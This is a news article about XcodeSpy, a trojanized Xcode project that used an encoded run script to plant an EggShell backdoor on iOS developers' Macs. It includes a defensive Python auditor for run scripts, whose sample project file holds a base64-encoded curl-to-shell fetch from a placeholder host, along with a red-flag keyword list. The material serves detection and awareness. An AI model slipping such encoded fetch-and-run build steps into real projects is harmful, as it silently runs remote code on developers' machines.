Researchers said they found a Trojanized code library in the wild that is trying to install advanced surveillance malware on iOS software developers' Macs.
It was a malicious project that the attacker wrote for Xcode, a developer tool that Apple makes available free of charge to developers who write apps for iOS or other Apple operating systems. The project was a copy of TabBarInteraction, a legitimate open source project that makes it easy for developers to animate iOS tab bars based on user interaction. An Xcode project is a repository for all of the files, resources, and information needed to build an app.
Walk on eggshells
Next to the legitimate code was a disguised script known as a "run script". The script, which ran every time the developer's build was launched, contacted an attacker-controlled server to download and install a custom version of EggShell, an open source backdoor that spies on users through the microphone, camera, and keyboard.
Researchers at SentinelOne, the security firm that discovered the Trojanized project, have named it XcodeSpy. They say they discovered two flavors of the customized EggShell that were dropped by the malicious project. Both were uploaded to VirusTotal from Japan via the web interface, the first on August 5th and the second on October 13th.
"The later sample was also found in the wild on a victim's Mac in the United States at the end of 2020," SentinelOne researcher Phil Stokes wrote in a blog post on Thursday. "For reasons of confidentiality, we cannot provide any further details about the ITW incident [in the wild]. However, the victim reported that they have been repeatedly attacked by North Korean APT actors and the infection came to light as part of their regular threat hunting activities."
So far, only one case from a US-based organization is known to the company's researchers. Evidence from the SentinelOne analysis suggests that the campaign "was operational between at least July and October 2020 and may also have targeted developers in Asia".
Thursday's post came two months after Microsoft and Google researchers said that North Korean government-sponsored hackers were actively trying to infect security researchers' computers. To gain the researchers' trust, the hackers spent weeks building Twitter personas and building working relationships online.
Eventually, the fake Twitter profiles prompted researchers to use Internet Explorer to open a webpage. Those who took the bait found that their fully patched Windows 10 computer had a malicious service and an in-memory backdoor installed. Microsoft fixed the vulnerability last week.
In addition to the watering hole attack, the hackers sent targeted developers a Visual Studio project that allegedly contained source code for a proof-of-concept exploit. The project contained custom malware that contacted the attackers' control server.
Seasoned developers have long known the importance of checking for malicious run scripts before using a third-party Xcode project. While such scripts are not difficult to spot, XcodeSpy tried to make the job harder by encoding its script.
Once decoded, the script could be seen contacting a server at cralev[.]me and sending the mysterious command mdbcmd via a reverse shell built into the server.
The only warning a developer would get after running the Xcode project looks like this:
SentinelOne provides a script that developers can use to easily find run scripts in their projects. Thursday's post also includes indicators of compromise that developers can use to find out if they have been targeted or infected.
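As an added illustration of the kind of check described above (this is not SentinelOne's script and not part of the original article), the following Python lists every run-script build phase in an Xcode project.pbxproj and flags bodies that use constructs a normal build phase rarely needs, decoding any long base64-looking run so an encoded script like XcodeSpy's does not hide its contents. The pbxproj fragment is constructed for the example; the domain in it is a placeholder.

```python
import base64
import re

# Constructed fragment of an Xcode project.pbxproj (hypothetical, not the
# XcodeSpy project). Xcode stores every "Run Script" phase as a
# PBXShellScriptBuildPhase object whose body lives in the shellScript key.
SAMPLE_PBXPROJ = r'''
        AB12 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "echo \"Building $PRODUCT_NAME\"\n";
        };
        CD34 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "eval \"$(echo Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3ggfCBzaA== | base64 -d)\"\n";
        };
'''

PHASE_RE = re.compile(r'isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};', re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
B64_RE = re.compile(r'[A-Za-z0-9+/]{24,}={0,2}')  # long base64-looking runs
# Constructs a legitimate build phase rarely needs; each one warrants a look.
RED_FLAGS = ('eval', 'base64', 'curl', 'wget', 'osascript', '| sh', '|sh', 'python -c')

def unescape(s):
    """Undo the backslash escapes pbxproj applies inside a shellScript value."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)

def find_run_scripts(pbxproj_text):
    """Return the decoded body of every run-script build phase."""
    scripts = []
    for phase in PHASE_RE.finditer(pbxproj_text):
        m = SCRIPT_RE.search(phase.group(1))
        if m:
            scripts.append(unescape(m.group(1)))
    return scripts

def audit_script(script):
    """Return the reasons a run script deserves manual review (empty if none)."""
    reasons = [f"uses {kw!r}" for kw in RED_FLAGS if kw in script]
    for blob in B64_RE.findall(script):
        try:
            decoded = base64.b64decode(blob, validate=True).decode('utf-8')
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text: leave it alone
        reasons.append(f"base64 decodes to {decoded.strip()!r}")
        reasons += [f"decoded payload uses {kw!r}" for kw in RED_FLAGS if kw in decoded]
    return reasons

if __name__ == '__main__':
    for script in find_run_scripts(SAMPLE_PBXPROJ):
        print(script.strip(), '->', audit_script(script) or 'looks clean')
```

Point `find_run_scripts` at the contents of a real `<project>.xcodeproj/project.pbxproj` before opening a third-party project; an empty reason list is not a guarantee, only the absence of the obvious tells.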
A vector for malice
It's not the first time Xcode has been used in a malware attack. In August last year, researchers discovered Xcode projects available online that contained exploits for two Safari zero-day vulnerabilities. As soon as one of the XCSSET projects was opened and built, according to a TrendMicro analysis, the malicious code was executed on the developers' Macs.
And in 2015, researchers found 4,000 iOS apps infected with XcodeGhost, the name of a compromised version of Xcode that was mainly distributed in Asia. Apps compiled with XcodeGhost can be used by attackers to read and write to the device's clipboard, open specific URLs, and exfiltrate data.
Unlike XcodeGhost, which infected apps, XcodeSpy targeted developers. Given the quality of the surveillance backdoor that XcodeSpy installs, it would not be difficult for the attackers to distribute malware to users of the developers' software as well.
"There are other scenarios with such high-value victims," wrote SentinelOne's Stokes. "Attackers could simply search for targets of interest and collect data for future campaigns, or they could try to collect AppleID credentials for other campaigns that use malware with valid Apple Developer code signatures. These proposals are neither exhaustive nor mutually exclusive."